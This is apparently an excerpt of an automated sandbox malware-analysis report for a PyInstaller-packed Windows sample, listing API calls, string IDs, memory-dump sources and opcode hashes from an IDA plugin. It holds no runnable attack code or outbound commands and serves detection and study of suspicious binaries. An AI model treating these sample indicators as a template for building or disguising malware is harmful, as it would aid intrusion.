                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                              • String ID: csm$csm$csm
                                                              • API String ID: 849930591-393685449
                                                              • Opcode ID: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                              • Instruction ID: 794c82b303f5e3d5b7cc6c91b9e4080ab274db0d023e0e03f98114b72fe0fbab
                                                              • Opcode Fuzzy Hash: e61afc8d21ba52cdbe611d77afa9c967b031d652e012678c684f0478f5a183c7
                                                              • Instruction Fuzzy Hash: D8D14C32E087468AEB60DB6594403AE77A0FB59B9CF100135EA6D97FA5EF38F491C740
                                                              APIs
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,0000022908958CB8,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE19C
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1FE3BA,?,?,0000022908958CB8,00007FF6FB1FA063,?,?,?,00007FF6FB1F9F5A,?,?,?,00007FF6FB1F524E), ref: 00007FF6FB1FE1A8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeLibraryProc
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 3013587201-537541572
                                                              • Opcode ID: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction ID: f91773464e4e3cebfd30156d09eb2faf33cdbfea43315af6720a273f4a939758
                                                              • Opcode Fuzzy Hash: 400d167c79677b3a1b331b2dd1a2c4ed1cd7dec94f3cf9f9612a621c3bffedbb
                                                              • Instruction Fuzzy Hash: D241CC22B19A0381EB26CB17A91467A2292BF8DBA8F084535DD2DD77E4FE3DE505C300
                                                              APIs
                                                              • GetTempPathW.KERNEL32(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7CE4
                                                              • CreateDirectoryW.KERNEL32(?,?,FFFFFFFF,00007FF6FB1E3834), ref: 00007FF6FB1E7D2C
                                                                • Part of subcall function 00007FF6FB1E7E10: GetEnvironmentVariableW.KERNEL32(00007FF6FB1E365F), ref: 00007FF6FB1E7E47
                                                                • Part of subcall function 00007FF6FB1E7E10: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6FB1E7E69
                                                                • Part of subcall function 00007FF6FB1F7548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB1F7561
                                                                • Part of subcall function 00007FF6FB1E26C0: MessageBoxW.USER32 ref: 00007FF6FB1E2736
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Environment$CreateDirectoryExpandMessagePathStringsTempVariable_invalid_parameter_noinfo
                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                              • API String ID: 740614611-1339014028
                                                              • Opcode ID: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                              • Instruction ID: 3fab048a01c5c4017447e2a7546bf2296505fa9d9af4630f50572a24fffc5199
                                                              • Opcode Fuzzy Hash: 41794429c51d27e0df7a21877b4f19c7cdf826b4f928fd21ea6cb85727b80d41
                                                              • Instruction Fuzzy Hash: 1D411515E0A64380FB24EB61A9652B91291AF8DBC8F441131EE2DD7BF6FE2CF5088340
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Fiber$Switch$CreateDelete
                                                              • String ID: *$..\s\crypto\async\async.c
                                                              • API String ID: 2050058302-1471988776
                                                              • Opcode ID: 419cdec9bab671cbcbab75131cab699312702b93d7ae234180eea406a646abb6
                                                              • Instruction ID: b94ec74ff9613146cc5d47408d55d93a44db47293c288d780f6a5ee74f8cf27e
                                                              • Opcode Fuzzy Hash: 419cdec9bab671cbcbab75131cab699312702b93d7ae234180eea406a646abb6
                                                              • Instruction Fuzzy Hash: 1BA16972B1AA4386EB24DF11E460A7963A0EF46B84F448031DAAD477F9EF3CE555E700
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              • Associated: 00000001.00000002.1990234767.00007FFDFB000000.00000002.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB00D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB065000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB079000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB08A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB090000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB09D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24D000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB24F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB27A000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2AB000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB2D1000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB31F000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB325000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB327000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB343000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1990278020.00007FFDFB350000.00000040.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991500652.00007FFDFB354000.00000080.00000001.01000000.00000010.sdmp
                                                              • Associated: 00000001.00000002.1991539153.00007FFDFB356000.00000004.00000001.01000000.00000010.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ffdfb000000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: OPENSSL_ia32cap$~$~$~$~
                                                              • API String ID: 1431749950-1981414212
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED06D
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED07B
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED0A5
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED113
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF6FB1ED29A,?,?,?,00007FF6FB1ECF8C,?,?,?,00007FF6FB1ECB89), ref: 00007FF6FB1ED11F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1990278020.00007FFDFB001000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFDFB000000, based on PE: true
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: MASK:$default$nombstr$pkix$utf8only
                                                              • API String ID: 2248877218-3483942737
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: Message$ErrorFormatLast
                                                              • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                              • API String ID: 3971115935-1149178304
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E821D
                                                              • K32EnumProcessModules.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E827A
                                                                • Part of subcall function 00007FF6FB1E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6FB1E3FA4,00000000,00007FF6FB1E1925), ref: 00007FF6FB1E86E9
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8305
                                                              • K32GetModuleFileNameExW.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8364
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E8375
                                                              • FreeLibrary.KERNEL32(?,00000000,?,00007FF6FB1E39F2), ref: 00007FF6FB1E838A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                              • String ID:
                                                              • API String ID: 3462794448-0
                                                              APIs
                                                                • Part of subcall function 00007FF6FB1E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6FB1E7B70
                                                                • Part of subcall function 00007FF6FB1E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6FB1E7B83
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6FB1E7BA8
                                                                • Part of subcall function 00007FF6FB1E7B50: GetLastError.KERNEL32 ref: 00007FF6FB1E7BB2
                                                                • Part of subcall function 00007FF6FB1E7B50: GetTokenInformation.ADVAPI32 ref: 00007FF6FB1E7BF2
                                                                • Part of subcall function 00007FF6FB1E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6FB1E7C0E
                                                                • Part of subcall function 00007FF6FB1E7B50: CloseHandle.KERNEL32 ref: 00007FF6FB1E7C26
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E848C
                                                              • LocalFree.KERNEL32(?,00007FF6FB1E3814), ref: 00007FF6FB1E8495
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                              • API String ID: 6828938-1529539262
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA5E7
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA61D
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA64A
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA65B
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA66C
                                                              • SetLastError.KERNEL32(?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A,?,?,?,?,00007FF6FB1F649F), ref: 00007FF6FB1FA687
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              Similarity
                                                              • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                              • String ID: Unhandled exception in script
                                                              • API String ID: 3081866767-2699770090
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ByteCharMultiWide
                                                              • String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
                                                              • API String ID: 1878133881-640379615
                                                              • Opcode ID: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                              • Instruction ID: af085a4454aabcc04595b0d90461438e07fab35b77b42f48f0c653e33665c215
                                                              • Opcode Fuzzy Hash: 185a5ded7e4d76afdc6dde510c40398ff569d270283616bd23a067f5071c39f1
                                                              • Instruction Fuzzy Hash: 15212172A1868781E730DB10F4617EE6364FB88788F401136E69D93AE9EF7CE655C740
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                              • Instruction ID: 9a6ff5160032f93f13c2f460ae862feda53ae65771ff672f3f30334ae9f44df5
                                                              • Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
                                                              • Instruction Fuzzy Hash: 15F09625B1970381EB209B24E49837D5320AF8DBA5F581635D57EC61F4EF3DD149D310
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _set_statfp
                                                              • String ID:
                                                              • API String ID: 1156100317-0
                                                              • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction ID: 620594066fdd09bc23555b06cb731c534d9d0e903a29610f9efb70cb57adf806
                                                              • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                              • Instruction Fuzzy Hash: B9118F36E58A0341F7541128D67537721406F6D3F4F662634EA7ECE6FAEE2CA8818710
                                                              APIs
                                                              • FlsGetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6BF
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA6DE
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA706
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA717
                                                              • FlsSetValue.KERNEL32(?,?,?,00007FF6FB1F98B3,?,?,00000000,00007FF6FB1F9B4E,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1FA728
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                              • Instruction ID: 4ccb9ce30468c37a51903fa91ec71163c5e46ceb78926bf98ca762b83b7ede2f
                                                              • Opcode Fuzzy Hash: 25d361a094b2c99e262beff41eaee06ac9464b6f74968b1c14d3cfe42ff85be4
                                                              • Instruction Fuzzy Hash: 7A113721F5C24342FB58E3259A5557A21A26F9C3B8E084334E83EC66F6FE2DE941C701
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Value
                                                              • String ID:
                                                              • API String ID: 3702945584-0
                                                              • Opcode ID: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                              • Instruction ID: 6e4fc18ec32506725c517572023f850b7cb6299b425e65a03e800070ac70ddf2
                                                              • Opcode Fuzzy Hash: a853173f6999e7d5ef833d9e4f06cbd56a904a1eb1d6261c936ae8f95b9bedb9
                                                              • Instruction Fuzzy Hash: D111F720E6C20742FB68E33559551BA22925F8E378E184734D93ECA2F6FD2DB841CA42
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989640265.00007FF6FB223000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989725163.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID: verbose
                                                              • API String ID: 3215553584-579935070
                                                              • Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                              • Instruction ID: bdfad847e93d5349798945b1985aad539a6d5d686fa60a9bfdd12c3c223e011b
                                                              • Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
                                                              • Instruction Fuzzy Hash: 5A91AD32E08A4781E721DE29E45137D3691AB49B9CF884136DAAE863F5FE3CE445C310
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1989528263.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000001.00000002.1989488665.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000001.00000002.1989584297.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmp
